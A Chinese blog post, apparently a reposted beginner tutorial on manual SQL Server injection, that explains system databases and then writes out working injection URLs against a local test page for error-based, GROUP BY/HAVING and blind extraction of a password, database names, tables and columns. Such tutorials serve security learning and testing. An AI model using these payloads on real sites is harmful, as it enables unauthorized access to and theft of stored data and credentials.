怎么select一个存储过程的结果 sqlserver_SQL server手工注入入门

最新推荐文章于 2021-01-30 08:13:26 发布
最新推荐文章于 2021-01-30 08:13:26 发布
阅读量639 收藏
点赞数
文章标签: 怎么select一个存储过程的结果 sqlserver

目录

0x01 SQL server基础

0x02 基本注入

SQL server部分版本已被黑客安装后门,详情请在文末查看。

0x01 SQL server基础

在学习注入之前,最重要的是要先了解SQL server的具体的东西,才能更好的进行注入操作

系统库

master

master数据库控制SQLserver的所有方面,这个数据库中包含所有的配置信息、用户登陆信息、当前正在服务器运行中的过程的信息

model

model数据库是建立所有数据库时的模板,当你建立一个新数据库时,SQL server会把model数据库中的所有对象建立一份拷贝并移到新数据库中,在模板对象被拷贝到新的用户数据库之后,该数据库的所有多余空间都将被页面填满

tempdb

tempdb数据库是一个非常特殊的数据库,供所有来访问SQL server的用户使用,这个库用来保存所有的临时表、存储过程和其他SQLserver建立的临时用的东西,例如,排序时要用到tempdb数据库,数据被放进tempdb数据库,排完序后再把结果返回给用户。每次SQL server重新启动,它都会清空tempdb数据库并重建,永远不要在tempdb数据库建立需要永久保存的表

msdb

msdb数据库是SQLserver中的一个特例,如果你查看这个数据库的实际定义,会发现它其实是一个用户数据库,不同之处是SQLserver拿这个数据库用来做什么,所有的任务调度、报警、操作员都存储在msdb数据库中,该库的另一个功能是用来存储所有备份历史,SQL server agent将会使用这个库

information_schema

information_schema是在SQL server2000及更高版本存在的,可以检索数据库中的对象的元数据,与MySQL中的有相同的功能,它是符合ISO标准的,与sys不同,sys是微软自己搞出来的东西

注释方法

C语言注释风格    /*
SQL注释风格     --
空字节          ;%00

0x02 基本注入

首先我们先访问注入网址

这里我们模拟的SQL语句是这样的

这里我们就先用1=1和1=2来做一个简单的判断

44f511db7ceabcd0d157093722c9373b.png

然后我们来尝试一下查看数据库版本

通过使用报错的方式将我们想要的值给带出来

http://127.0.0.1/index.php?id=1%20and%201=(select%20@@version)

5eab3fa7933a55854d989a3c85de5c59.png

使用db_name()来查看数据库名

http://127.0.0.1/index.php?id=1%20and%201=(select%20db_name())

258b9e6b7a7326be73771cb8be9d7e97.png

等等可以获取到一些我们所需要的信息

接下来使用having字句来获取当前数据库的表名和列名

http://127.0.0.1 /index.php?id=1%20having%201=1

fd109a2d3890aed82f86cf3c594bc39a.png

然后我们继续使用上一个所得到的值来递归获取所有的名

http://127.0.0.1/index.php?id=1%20group%20by%20test.id%20having%201=1

f3cf054bcf97fc1f87e8356ed5d2609c.png 
http://127.0.0.1/index.php?id=1%20group%20by%20test.id,test.name%20having%201=1

9237a62cecdad0b2690a2ba537eefb41.png 
http://127.0.0.1/index.php?id=1%20group%20by%20test.id,test.name,test.password%20having%201=1

70ef295a9b7b0e97424213a8e1ccfb21.png

通过上面这样的方法,我们就已经得到了当前使用的数据库为test,其中的列有idnamepassword

然后我们注入password的数据

http://127.0.0.1/index.php?id=1%20and%20(select%20top%20%201%20%20unicode(substring(password,1,1))%20from%20test)%3E=49

c2099b73e06793366ac6ad4196253f1f.png 
http://127.0.0.1/index.php?id=1%20and%20(select%20top%20%201%20%20unicode(substring(password,1,1))%20from%20test)%3E=50

cff680f2e9e0b2e10d077e6e94b37d32.png

可以知道第一个为字符1

然后继续猜解第二个字符

http://127.0.0.1/index.php?id=1%20and%20(select%20top%20%201%20%20unicode(substring(password,2,1))%20from%20test)%3E=50

4d94550910014729ecda900c3a2139af.png 
http://127.0.0.1/index.php?id=1%20and%20(select%20top%20%201%20%20unicode(substring(password,2,1))%20from%20test)%3E=51

32d623b7f6c242bdbc50fcb8769c48fa.png

可以得到第二个字符为2

依此类推得到最终的结果为123456

我们还可以通过注入获取到其他的数据库名称

http://127.0.0.1/index.php?id=1%20and%20%201=(select%20top%201%20name%20%20from%20%20master..sysdatabases)

9a67958aa34f0505506abd1c2cc0056c.png

但是由于只能输出一个字段的内容,所以这里使用where语句的not in来进行获取

http://127.0.0.1/index.php?id=1%20and%20%201=(select%20top%201%20name%20%20from%20%20master..sysdatabases%20where%20%20name%20%20not%20%20in%20%20('master'))

ad15b7d447efae24073e2ddac731010c.png

得到了第二个数据库model。然后通过这样的方式继续往后遍历

http://127.0.0.1/index.php?id=1%20and%20%201=(select%20top%201%20name%20%20from%20%20master..sysdatabases%20where%20%20name%20%20not%20%20in%20%20('master','model'))

288a4154a0cc112bb8f1448aed61cea6.png

继续遍历就可以了

http://127.0.0.1/index.php?id=1%20and%20%201=(select%20top%201%20name%20%20from%20%20master..sysdatabases%20where%20%20name%20%20not%20%20in%20%20('master','model','msdb'))

0f56d165eb27472a917f8f426077d6b8.png

在得到数据库test之后,我们使用information.schema来获取数据表

http://127.0.0.1/index.php?id=1%20and%201=(select%20top%201%20table_name%20from%20test.information_schema.tables)

10b43b1a976a34b1272a69bcd4c1af0f.png

这里我们只有一个表,如果有多个表的话,可以通过之前not in的方法来进行获取

到这里我们就已经知道了数据库为test,数据表也为test

接下来该获取字段了

http://127.0.0.1/index.php?id=1%20and%201=(select%20top%201%20column_name%20from%20test.information_schema.columns%20where%20table_name%20=%20'test')

cf21293af1cd7d06ce10af1a90a2361b.png

然后同样使用not in的方法可以遍历得到所有的列名

http://127.0.0.1/index.php?id=1%20and%201=(select%20top%201%20column_name%20from%20test.information_schema.columns%20where%20table_name%20=%20'test'%20and%20column_name%20not%20in%20('id'))

09763640f90d2873a663919496816d8a.png

之后获取数据就跟之前的方法是一样的了

这篇文章只是一个简单的开头,至于更多的内容还需要大家来看,最后再给大家提一下刚爆出来的一个上游攻击的事件,SQL server部分版本已经被黑客组织植入后门程序skip-2.0,在安装了中招的SQL server之后,可以允许黑客不进行身份验证而直接进行登陆。

52dc5c11dd5707c0292292d0ecba3657.png

c757b974307e3a0b128232b4258c5f12.png

可以去FreeBuf了解其他详情

https://www.freebuf.com/news/217738.html

文章首发公众号:无心的梦呓(wuxinmengyi)

这是一个记录红队学习、信安笔记,个人成长的公众号

扫码关注即可

cff2c440d0c6efe6004806c6025e1920.png
weixin_39798031
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL Server 存储过程
xhe520811的博客
07-31 835
SQL Server 存储过程 Transact-SQL中的存储过程,非常类似于Java语言中的方法,它可以重复调用。当存储过程执行一次后,可以将语句缓存中,这样下次执行的时候直接使用缓存中的语句。这样就可以提高存储过程的性能。 Ø 存储过程的概念 存储过程Procedure是一组为了完成特定功能的SQL语句集合,经编译后存储在数据库中,用户通过指定存储过程的名称并给出参...
mysql 存储过程 select 循环_简简单单储存过程——循环一个select结果集
weixin_32529407的博客
01-19 2728
摘要:本文主要讲解了存储过程的创建、调用、以及游标的使用,相信掌握了游标 会对你有不错的帮助,有不足之处还请指教导航: 一、存储过程的创建及调用二 、游标的使用三、 示例四、补充说明:1、用到的两个数据表:from_datato_data2、示例需求 :将表from_data 的select结果集循环插入到表to_data;伪代码:while 循环 select id ,name...
select 存储过程 mysql_mysql实例:存储过程中使用select查询语句
weixin_28726391的博客
01-30 2872
在mysql存储过程中,使用select查询语句。代码:mysql> CREATE TABLE Employee(-> id int,-> first_name VARCHAR(15),-> last_name VARCHAR(15),-> start_date DATE,-> ...
SqlSerVer SQL存储过程整理
xiaoyaoyujh的博客
05-24 247
SQLSERVER 变量声明有两种方式 1.set @aa='123' 2.select @aa = a from TABLE_NAME 游标声明有三种方式 这里是while循环语句 cursor游标的状态 用@@FETCH_STATUS 来进行表示  @@fetch_status是全局变量是全局变量     @@fetch_status是MicroSoft SQL SERVE...
sqlserver存储过程SELECT 与 SET 对变量赋值的区别
09-11
SQLServer中对已经定义的变量赋值的方式用两种,分别是 SET 和 SELECT。对于这两种方式的区别,SQL Server 联机丛书中已经有详细的说明,但很多时候我们并没有注意,其实这两种方式还是有很多差别的。
Sql Server 存储过程调用存储过程接收输出参数返回值
09-09
本篇文章将详细讲解如何在SQL Server中调用一个存储过程并接收输出参数以及返回值。 首先,我们来看如何创建一个带有输出参数的存储过程。在下面的例子中,`GetCustomers` 存储过程接收一个名为 `@rowCount` 的输出...
Java调用SQL Server存储过程详解
12-22
 作为实例,在 SQL Server 2005 AdventureWorks 示例数据库中创建以下存储过程:  CREATE PROCEDURE GetContactFormalNames   AS  BEGIN  SELECT TOP 10 Title + "" "" + FirstName + "" "" + LastName ...
分页 SQLServer存储过程
12-15
/*–用存储过程实现的分页程序 显示指定表、视图、查询结果的第X页 对于表中主键或标识列的情况,直接从原表取数查询,其它情况使用临时表的方法 如果视图或查询结果中有主键,不推荐此方法 –邹建 2003.09–*/ /*–...
SQL Server交叉查询存储过程实现(带查询条件)
04-16
最近做一个教辅评价的项目,由于教辅的扩展属性不确定,需要动态配置,纠结了好久,最后只能选择交叉查询(纵向转横向),将实现源码与大家共享,希望能够给予好的意见,共同进步。
sqlserver 支持多表联合查询分页存储过程
05-24
sqlserver 支持多表联合查询分页存储过程 sqlserver 支持多表联合查询分页存储过程 sqlserver 支持多表联合查询分页存储过程 sqlserver 支持多表联合查询分页存储过程
SqlServer-存储过程分页
七海桑城
08-31 1万+
学习资料参考:https://blog.csdn.net/bodilove/article/details/73991783                           https://www.cnblogs.com/JustYong/p/6078353.html 第一种 CREATE PROCEDURE [dbo].[OrderInfo_PAGE]     @TableName V...
SqlServer-IN写法(普通、存储过程
热门推荐
七海桑城
08-24 2万+
创建一张表,然后往里面添加三笔数据 CREATE TABLE Table_GuidTestIn (     Guid  UNIQUEIDENTIFIER PRIMARY KEY,     name NVARCHAR(50)not null ) insert into Table_GuidTestIn(Guid,name)values(NEWID(),'111') insert i...
JDBC获取存储过程select出的结果集
若即的专栏
11-15 4485
SQLServer在JDBC下获取存储过程select出的结果值。
sqlserver存储过程返回结果_数据库基础知识:SQL Server存储过程入门必知
weixin_35925259的博客
01-25 1193
什么是存储过程SQL语句需要先编译然后执行,而存储过程(Stored Procedure)是一组为了完成特定功能的SQL语句集,经编译后存储在数据库中,用户通过指定存储过程的名字并给定参数(如果该存储过程带有参数)来调用执行它。存储过程语法CREATE PROCEDURE 过程名([[IN|OUT|INOUT] 参数名 数据类型[,[IN|OUT|INOUT] 参数名 数据类型…]]) [特性 ....
查询SQL_server存储过程结果
最新发布
04-26
您好,您想知道如何查询 SQL Server 存储过程的结果。可以使用 EXECUTE 或者 EXEC 命令来执行存储过程。执行命令时可以将结果集存储到表变量或临时表中。 例如,如果您要执行名为 "get_customer_info" 的存储过程,并将结果存储到名为 "customer_info" 的表变量中,可以使用以下命令: DECLARE @customer_info TABLE ( customer_id INT, customer_name VARCHAR(50), customer_email VARCHAR(50) ) INSERT INTO @customer_info EXEC get_customer_info SELECT * FROM @customer_info 希望对您有所帮助!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值